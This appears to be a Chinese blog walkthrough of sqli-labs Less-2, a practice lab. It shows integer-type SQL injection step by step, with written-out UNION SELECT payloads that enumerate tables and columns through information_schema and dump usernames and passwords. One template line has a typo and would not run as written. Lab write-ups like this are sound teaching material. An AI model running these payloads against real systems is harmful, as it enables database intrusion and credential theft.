判断注入类型
GET1 and 1=1,回显如下:
GET1 and 1=2,没有回显:
说明该漏洞类型为整型注入。
判断注入点个数
GET1 order by 3,回显如下:
GET1 order by 4,回显如下:
说明注入点个数为3个
即可构造语句如下
-1' union select 1,2,xx form xx; --+
1
查库名
-1 union select 1,2,database(); --+
查表名
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+
查users表的列名
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+
查字段
-1 union select 1,group_concat(password),group_concat(username) from security.users; --+
注意
group_concat(password)的回显点在第二点上,对应回显页面中的Your Login name
group_concat(username)的回显点在第三点上,对应回显页面中的Your Password
除此之外,可以单独查询username和password,如下:
-1 union select 1,2,group_concat(username) from security.users; --+
该页面回显即为用户名;
-1 union select 1,2,group_concat(password) from security.users; --+
该页面回显即为密码。
总结
以上为[网络安全]sqli-labs Less-2 解题详析,后续将分享[网络安全]sqli-labs Less-3 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。